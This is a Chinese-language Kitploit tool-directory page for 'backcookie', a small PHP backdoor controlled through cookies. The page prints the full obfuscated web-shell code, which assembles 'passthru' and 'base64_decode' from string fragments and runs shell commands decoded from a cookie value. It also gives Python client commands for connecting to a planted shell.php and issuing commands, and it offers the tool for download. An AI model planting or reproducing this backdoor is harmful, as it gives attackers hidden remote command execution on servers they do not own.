Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
backcookie — 使用 Cookie 的小型后门。 | Kitploit
工具/GitHubGitHub/jofpin/backcookie
Payload生成Web应用程序漏洞利用渗透测试命令与控制红队远程访问木马
GitHubjofpin/backcookie

backcookie

使用 Cookie 的小型后门。

查看仓库
643659年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

backcookie

使用 cookie 的小型后门。

==========

root@kitploit:~
<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
root@kitploit:~
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
root@kitploit:~
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

自定义命令(binfo),可以获取目标信息。

root@kitploit:~
@pwned:~$ binfo

自定义命令(exit),用于退出。

root@kitploit:~
@pwned:~$ exit
  • 收录于 -> blackarch

黑客愉快!


版权所有,2013 - 2016 Jose Pino

下载工具